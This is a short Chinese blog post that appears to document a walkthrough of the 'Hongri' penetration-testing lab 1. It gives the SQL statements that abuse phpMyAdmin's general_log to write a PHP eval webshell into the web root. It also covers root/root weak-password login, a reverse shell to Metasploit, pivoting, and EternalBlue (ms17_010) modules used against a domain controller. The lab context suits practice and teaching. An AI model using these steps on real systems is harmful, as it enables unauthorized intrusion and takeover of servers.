红日靶场1

descript

渗透过程概述:

1、信息收集-->phpmyadmin日志写shell,上线msf,提权

端口扫描,root/root弱口令登录mysql,登录phpmyadmin,利用日志文件写shell。蚁剑连接,反弹shell上线msf,添加路由。

2、内网渗透-->域控

永恒之蓝,ms17_010_command模块上线域内主机。

密码:hongrisec@2022


1、信息收集

1.1 masscan+nmap 端口扫描

扫端口:80、3306

2、漏洞挖掘【mysql弱口令】

2.1 mysql弱口令检测

http://192.168.1.103/  root root 弱口令登陆

descript

descript

3、漏洞利用【phpmyadmin日志写shell】

http://192.168.1.103/phpmyadmin/ 日志写shell

show variables like '%general%';

SET GLOBAL general_log='on';

SET GLOBAL general_log_file='C:/phpStudy/www/shell.php';

SELECT '<?php eval($_POST["cmd"]);?>'

蚁剑连接。

4、提权

反弹shell(普通x64的,免杀x64和普通x86的都不行),上线msf。

5、内网渗透【win server 2008 dc渗透】

添加路由,设置代理

god/administrator 用户可直接访问域控:

dir \\192.168.52.138\c$

copy 上传正向连接后门

 

search ms17_010

只有下面的可用:

auxiliary/admin/smb/ms17_010_command

添加用户,远程桌面登录

(ms17_010_psexec 失败):

exploit/windows/smb/ms17_010_psexec

6、横向移动【win 2003 渗透】

与server 2008 dc相同的操作

7、权限维持

8、痕迹清理

posted @ 2023-03-23 13:39  hello_bao  阅读(81)  评论(0)    收藏  举报